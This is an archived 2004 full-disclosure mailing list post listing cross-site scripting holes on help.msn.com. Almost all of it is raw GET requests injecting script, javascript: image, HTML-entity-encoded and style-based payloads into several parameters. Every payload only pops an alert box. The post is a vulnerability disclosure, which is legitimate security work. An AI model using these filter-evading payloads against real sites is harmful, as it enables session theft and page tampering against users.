[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041207104629.2901.qmail@web25002.mail.ukl.yahoo.com>
From: contact_jamie_fisher at yahoo.co.uk (jamie fisher)
Subject: help.msn.com
This is gonna be quick'n'dirty. My dinner is almost cooked...
More XSS for MSN to add to the list:
1. Cross site scripting (In JavaScript context)
http://help.msn.com/en_au/DirectedHelpControls.asp
1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0
2 Cross site scripting (Standard variants)
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
3 Cross site scripting (Standard variants)
http://help.msn.com/en_au/DirectedHelpControls.asp
3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
4 Cross site scripting using HTML entities
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
5 Cross site scripting using HTML entities
http://help.msn.com/en_au/DirectedHelpControls.asp
5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
6 Cross site scripting without using '<' and '>' symbols
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
7 Cross site scripting without using '<' and '>' symbols
http://help.msn.com/en_au/directedhelp.asp
7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0
I won't say how to fix. The last time I ran XSS by a website (Kevin Mitnicks), some nematode <">http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix. Bearing in mind the triviality of XSS I really shouldn't have bothered; but I did.
<!--# Greets:
Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my keypad, and all the lads on the contract where I am currently -->
---------------------------------
Moving house? Beach bar in Thailand? New Wardrobe? Win ?10k with Yahoo! Mail to make your dream a reality.
---------------------------------
Win a castle for NYE with your mates and Yahoo! Messenger
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20041207/6eae6bd4/attachment.html
Powered by blists - more mailing lists